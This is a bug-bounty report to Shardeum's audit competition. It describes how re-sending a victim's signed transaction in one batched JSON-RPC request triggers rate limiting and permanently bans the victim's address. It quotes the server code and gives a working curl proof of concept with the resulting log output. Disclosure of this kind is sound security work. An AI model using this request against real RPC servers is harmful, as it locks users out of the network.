# #39623 \[W\&A-Low] Blocking the victim's account address from sending transactions via JSON-RPC

**Submitted on Feb 3rd 2025 at 16:08:02 UTC by @anton\_quantish for** [**Audit Comp | Shardeum: Ancillaries III**](https://immunefi.com/audit-competition/audit-comp-shardeum-ancillaries-iii)

* **Report ID:** #39623
* **Report Type:** Websites and Applications
* **Report severity:** Low
* **Target:** <https://github.com/shardeum/json-rpc-server/tree/itn4>
* **Impacts:**
  * Temporarily disabling user to access target site, such as:
    * Locking up the victim from login
    * Cookie bombing, etc.

## Description

## Brief/Intro

It is possible to block the victim's account address so that it can no longer send any transactions via JSON-RPC.

## Vulnerability Details

When a JSON-RPC request comes in, it first passes through the `rateLimit.ts` middleware, and then every method call is checked via the `checkRequest(ip, request)` function. Finally, the rate limits are checked in the `utils.ts:isRequestOkay` function.

In the case of the `eth_sendRawTransaction` method, one of the checks performed is how often the transaction sender (the account address) calls this method. If it is too often (more than 10 calls per minute in the default config), the request is cancelled and the sender is marked as abused:\
<https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L1097-L1109>

```js
if (config.rateLimit && config.rateLimitOption.limitFromAddress) {
  if (fromAddressHistory && fromAddressHistory.length >= 10) {
    if (now - fromAddressHistory[fromAddressHistory.length - 10] < oneMinute) {
      if (verbose) console.log(`Your address ${readableTx.from} injected 10 txs within 60s`)
      if (config.recordTxStatus)
        createRejectTxStatus(
          bufferToHex(transaction?.hash() as Buffer),
          'Rejected by JSON RPC rate limiting',
          ip
        )
      this.addAbusedAddress(readableTx.to, readableTx.from as string, ip)
      this.addAbusedSender((readableTx.from as string).toLowerCase())
      return false  // isRequestOkay's return value: false means the request is cancelled
    }
  }
}
```

Moreover, every 2 minutes (by default) the top 10 most abusive senders are blacklisted, so they are permanently blocked from sending transactions (in the `checkAndBanSpammers` function):\
<https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L823-L836>

```js
const mostAbusedSendersSorted: { address: string; count: number }[] = Object.values(
  this.abusedSenders
).sort(
  (a: { address: string; count: number }, b: { address: string; count: number }) => b.count - a.count
)
console.log('Top 10 spammer addresses: ', mostAbusedSendersSorted.slice(0, 10))
for (const spammerInfo of mostAbusedSendersSorted) {
  if (spammerInfo.count > allowedTxRate && config.rateLimit && config.rateLimitOption.banSpammerAddress) {
    this.addSenderToBacklist(spammerInfo.address)
    console.log(
      `Caller ${spammerInfo.address} is added to spammer list due to sending more than ${allowedTxRate} txs within 5 min.`
    )
  }
}
```

The attack is that an attacker can re-send any of the victim's already-signed transactions to this endpoint to get the victim's account address banned, so the victim can no longer submit their own transactions.

## Impact Details

The victim is not able to send transactions via JSON-RPC anymore.

It is entirely possible to get the victim's address banned on every public JSON-RPC server, since the attack requires just a single request per JSON-RPC server. This would block the victim from using the Shardeum network at all.

## Proof of Concept

While the JSON-RPC server is running, take any raw transaction of the victim and make the following request with curl:

```sh
# <SAME_RAW_TX> stands for the same raw transaction hex that is shown in full in the seventh entry
curl http://172.16.205.128:8080 -XPOST -H 'Content-Type: application/json' --data '[{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["<SAME_RAW_TX>"]}]'
```

There are 11 copies of the same transaction in the single batch. This single request is all that is needed to get the sender address banned. You will see the following in the JSON-RPC server log:

> adding abused sender 0x7f39a55849ff447813557946fe387861784aadca

Then, if you try to send any other transaction from the victim's address, you will see that it is soft-rejected:

> Network is currently busy. Please try again later.

